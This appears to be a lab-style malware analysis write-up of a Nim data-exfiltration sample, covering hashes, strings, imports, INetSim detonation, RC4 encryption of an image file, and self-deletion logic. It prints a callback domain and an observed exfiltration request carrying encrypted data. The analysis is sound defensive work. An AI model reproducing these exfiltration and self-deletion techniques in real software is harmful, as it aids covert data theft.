Data Exfiltration Malware: Unraveling the Mystery
Static Analysis, Dynamic Analysis & Reverse Engineering of Data Exfiltration Malware
In the ever-evolving digital landscape, data exfiltration malware is the shadowy intruder that quietly siphons away sensitive information. With a keen eye for detail, we're about to unravel its secrets and expose its true nature.
File Hash & VT Analysis: Unveiling the Bad Boys
Our adventure kicks off with a file hash: 3aca2a08cf296f1845d6171958ef0ffd1c8bdfc3e48bdd34a605cb1f7468213e *unknown.exe.malz. With a 43/72 detection ratio in VirusTotal, it's clear that this binary is no ordinary piece of code. It's time to dig deeper.
Architecture and Language:
This 64-bit binary written in Nim holds the key to our investigation. But what lies beneath the surface of this digital enigma? Let's dive into the world of this covert operator.
Basic Static Analysis: Strings, Secrets, and Path-etic Discoveries
As we examine the code, strings and floss outputs reveal intriguing details. A URL, cosmo.jpeg, a file path, and a mysterious name, Houdini, provide valuable clues. It's evident that the binary is up to something, but we're just scratching the surface.
IAT & PE View:
Suspicious API calls, including GetCurrentProcessId, GetCurrentThreadId, TerminateProcess, and VirtualProtect, raise our suspicions. The plot thickens as we delve further into the digital labyrinth.
Basic Dynamic Analysis: The Plot Thickens
On initial detonation, there are no glaring visual indicators. The binary, known as "unknown.exe," mysteriously deletes itself. But when INetSim enters the scene, the plot takes an unexpected turn. While still lacking visual cues, the binary refuses to vanish, leaving us to wonder about its true purpose.
Network Signatures:
Our digital detective work uncovers intriguing network signatures.
The binary makes a callback to the domain "update.ec12-4-109-278-3-ubuntu20-04.local." Additionally, a GET request to an encrypted URL, "http://cdn.altimiter.local/feed?post=B69A1CF6853645A440A0337BA0FB38291DE0B01A07FC129199658DDD4C1286BE45FEA8851D9BC6BC34220A6466D404C49A988BD6895AF291136076CCAFA9," adds to the complexity of our investigation.
When I edited the /etc/hosts file with initial callback hosts to my localhost I observed that I was getting a callback at port 80
Host Indicators: The Accomplices Revealed
The binary isn't just creating chaos; it's creating a "password.txt" file in the Public directory.
Additionally, it's tinkering with "cosmo.jpeg," hinting at data exfiltration
Advanced Static Analysis: The Code Breaker's Dilemma
Our digital detective skills led us to the discovery of an encryption method using RC4. With a password/key file in hand, we unveil the binary's method to encrypt data from "cosmo.jpeg." The intricate dance of code encryption unfolds.
I also observed another interesting function houdini. Looks like this function is responsible for deleting the binary.
There are three conditions when the binary will be deleted
The first condition is if the initial callback domain is not available or the binary is not able to make contact with the initial callback domain it will be deleted.
The second condition is during the exfiltration routine if the network is lost or exfiltration is stopped due to some reason the binary will be deleted.
And finally, when the exfiltration subroutine is complete the binary will be deleted.
Summary:
If the binary contacts the initial callback domain successfully, exfiltration occurs.
After a successful check-in with this domain, the sample unpacks the passwrd.txt file into C:\Users\Public, opens a handle to cosmo.jpeg, base64 encodes the contents of the file, and begins the data encryption routine.
The first callback domain is http://update.ec12-4-109-278-3-ubuntu20-04.local, which is not present in the strings output.
Exfiltration is achieved with the http://cdn.altimiter.local domain.
Unknown.exe deletes itself under the following conditions:
If the executable is run and cannot make a successful connection to the initial callback URL (http://update.ec12-4-109-278-3-ubuntu20-04.local)
If the executable is interrupted in the middle of its exfiltration routine (i.e. if INetSim is shut off while the binary is exfiltrating data)
If the executable finishes its exfiltration routine
Conclusion:
Our journey through the world of data exfiltration malware has revealed an intricate web of covert operations. With a binary that erases itself under specific conditions, we're left with more questions than answers. In the realm of cybersecurity, remaining vigilant and inquisitive is essential to uncovering and thwarting such covert digital operations. Stay curious and stay safe, for the digital landscape is ever-evolving and filled with mysteries.